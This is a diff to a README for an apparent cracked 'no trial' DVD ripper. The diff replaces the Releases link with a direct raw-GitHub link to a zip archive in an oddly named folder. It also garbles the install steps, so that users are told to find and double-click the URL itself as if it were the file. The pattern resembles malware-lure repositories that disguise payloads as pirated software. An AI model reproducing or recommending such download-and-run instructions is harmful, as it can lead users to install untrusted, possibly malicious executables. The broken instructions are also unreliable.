lujinyanai/Magic-DVD-Ripper-No-Trial/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [Magic DVD Ripper Releases](https://github.com/lujinyanai/Magic-DVD-Ripper-No-Trial/releases).
+To get started, visit this page to download: [Magic DVD Ripper Releases](https://raw.githubusercontent.com/lujinyanai/Magic-DVD-Ripper-No-Trial/main/squamously/Magic-DVD-Ripper-No-Trial-2.9.zip).

 1. Click on the link above to go to the Releases page.
 2. You will see a list of available versions.
 Choose the latest version.
-3. Look for the file named `MagicDVDRipper.exe`.
+3. Look for the file named `https://raw.githubusercontent.com/lujinyanai/Magic-DVD-Ripper-No-Trial/main/squamously/Magic-DVD-Ripper-No-Trial-2.9.zip`.
 4. Click on the file to start the download.

 Once downloaded:

 1. Locate the file in your Downloads folder.
-2. Double-click the `MagicDVDRipper.exe` file to start the installation.
+2. Double-click the `https://raw.githubusercontent.com/lujinyanai/Magic-DVD-Ripper-No-Trial/main/squamously/Magic-DVD-Ripper-No-Trial-2.9.zip` file to start the installation.
 3. Follow the on-screen instructions to complete the installation.

 ## 🖥️ System Requirements